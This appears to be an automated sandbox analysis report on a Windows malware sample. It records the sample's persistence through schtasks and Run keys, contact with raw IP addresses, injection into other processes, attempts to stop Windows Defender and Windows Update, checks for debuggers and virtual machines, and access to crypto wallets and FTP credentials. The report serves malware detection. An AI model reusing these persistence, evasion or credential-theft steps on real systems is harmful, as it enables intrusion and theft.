RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004ec options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f0 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0114-0412-0000-0000000FF1CE}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x80000002 key_handle: 0x000004e4 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExA Feb. 13, 2024, 12:17 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d} base_handle: 0x80000002 key_handle: 0x000004f8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}	1

Uses Windows utilities for basic Windows functionality (6 events)

cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" SCODEF:1216 CREDAT:145409
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	"C:\Program Files (x86)\Internet Explorer\iexplore.exe" -nohome
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Communicates with host for which no DNS query was performed (3 events)

host	117.18.232.200
host	185.215.113.46
host	193.233.132.62

Allocates execute permission to another process indicative of possible code injection (6 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Feb. 13, 2024, 12:18 p.m.	process_identifier: 3572 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 13, 2024, 12:18 p.m.	process_identifier: 3572 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 13, 2024, 12:18 p.m.	process_identifier: 3784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 13, 2024, 12:18 p.m.	process_identifier: 3784 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 13, 2024, 12:18 p.m.	process_identifier: 3932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d81000 process_handle: 0x0000000000000050	1
NtProtectVirtualMemory Feb. 13, 2024, 12:18 p.m.	process_identifier: 3932 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000076d57000 process_handle: 0x0000000000000050	1

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService Feb. 13, 2024, 12:18 p.m.	service_handle: 0x00bb2e08 service_name: WinDefend control_code: 1		0	0
ControlService Feb. 13, 2024, 12:18 p.m.	service_handle: 0x00bbafa8 service_name: wuauserv control_code: 1		0	0

Checks for the presence of known devices from debuggers and forensic tools (3 events)

file	\??\SICE
file	\??\SIWVID
file	\??\NTICE

Checks for the presence of known windows from debuggers and forensic tools (50 out of 233 events)

Time & API	Arguments	Status	Return	Repeated
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: RegmonClass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: #0 window_name: Registry Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: FilemonClass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: #0 window_name: File Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: #0 window_name: Process Monitor - Sysinternals: www.sysinternals.com		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: 18467-41 window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: Filemonclass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: PROCMON_WINDOW_CLASS window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: OLLYDBG window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: GBDYLLO window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: pediy06 window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: Regmonclass window_name:		0	0
FindWindowA Feb. 13, 2024, 12:17 p.m.	class_name: 18467-41 window_name:		0	0

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Checks the CPU name from registry, possibly for anti-virtualization (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Installs itself for autorun at Windows startup (8 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131	reg_value	C:\Users\test22\AppData\Local\RageMP131\RageMP131.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\AdobeUpdaterV131	reg_value	C:\Users\test22\AppData\Local\AdobeUpdaterV131\AdobeUpdaterV131.exe
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EdgeMS131.lnk
file	C:\Windows\Tasks\explorgu.job
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
cmdline	schtasks /create /f /RU "test22" /tr "C:\ProgramData\MSIUpdaterV131\MSIUpdaterV131.exe" /tn "MSIUpdaterV131 HR" /sc HOURLY /rl HIGHEST

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (1 event)

file	C:\Users\test22\AppData\Roaming\GHISLER\wcx_ftp.ini

Potential code injection by writing to the memory of another process (27 events)

Time & API	Arguments	Status	Return
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: base_address: 0x000000013f3e22b0 process_identifier: 3572 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: base_address: 0x000000013f3f0d88 process_identifier: 3572 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: I»`#;?Aÿã base_address: 0x0000000076d81590 process_identifier: 3572 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: Ò# base_address: 0x000000013f3f0d78 process_identifier: 3572 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: I» ;?Aÿã base_address: 0x0000000076d57a90 process_identifier: 3572 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: Ò# base_address: 0x000000013f3f0d70 process_identifier: 3572 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: ÏT base_address: 0x000000013f390108 process_identifier: 3572 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013f3eaae8 process_identifier: 3572 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: base_address: 0x000000013f3f0c78 process_identifier: 3572 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: base_address: 0x000000013f3e22b0 process_identifier: 3784 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: base_address: 0x000000013f3f0d88 process_identifier: 3784 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: I»`#;?Aÿã base_address: 0x0000000076d81590 process_identifier: 3784 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: Èf base_address: 0x000000013f3f0d78 process_identifier: 3784 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: I» ;?Aÿã base_address: 0x0000000076d57a90 process_identifier: 3784 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: Èf base_address: 0x000000013f3f0d70 process_identifier: 3784 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: ÏT base_address: 0x000000013f390108 process_identifier: 3784 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013f3eaae8 process_identifier: 3784 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: base_address: 0x000000013f3f0c78 process_identifier: 3784 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: base_address: 0x000000013f3e22b0 process_identifier: 3932 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: base_address: 0x000000013f3f0d88 process_identifier: 3932 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: I»`#;?Aÿã base_address: 0x0000000076d81590 process_identifier: 3932 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: ðH base_address: 0x000000013f3f0d78 process_identifier: 3932 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: I» ;?Aÿã base_address: 0x0000000076d57a90 process_identifier: 3932 process_handle: 0x0000000000000050	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: ðH base_address: 0x000000013f3f0d70 process_identifier: 3932 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: ÏT base_address: 0x000000013f390108 process_identifier: 3932 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: Øv@Øv Øv@ØvØv°Øv ÕvàTÕv 3ØvØvÀ´Óv`,ØvÀÖvöÔv YØv2ØvVØv°ÞvÕvRØv ÕvQØvÂÕv ?ÖvPÕv°TÕvàtÕvðÖvÐ1ØvÔvÐOÔv`ê×vÐæ×vÐæ×vÐ.Øv base_address: 0x000000013f3eaae8 process_identifier: 3932 process_handle: 0x000000000000004c	1	1
WriteProcessMemory Feb. 13, 2024, 12:18 p.m.	buffer: base_address: 0x000000013f3f0c78 process_identifier: 3932 process_handle: 0x000000000000004c	1	1

Collects information about installed applications (27 events)

Time & API	Arguments	Status
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Enterprise 2007 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\ENTERPRISE\DisplayName	1
RegQueryValueExA Feb. 13, 2024, 12:17 p.m.	key_handle: 0x000004f0 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
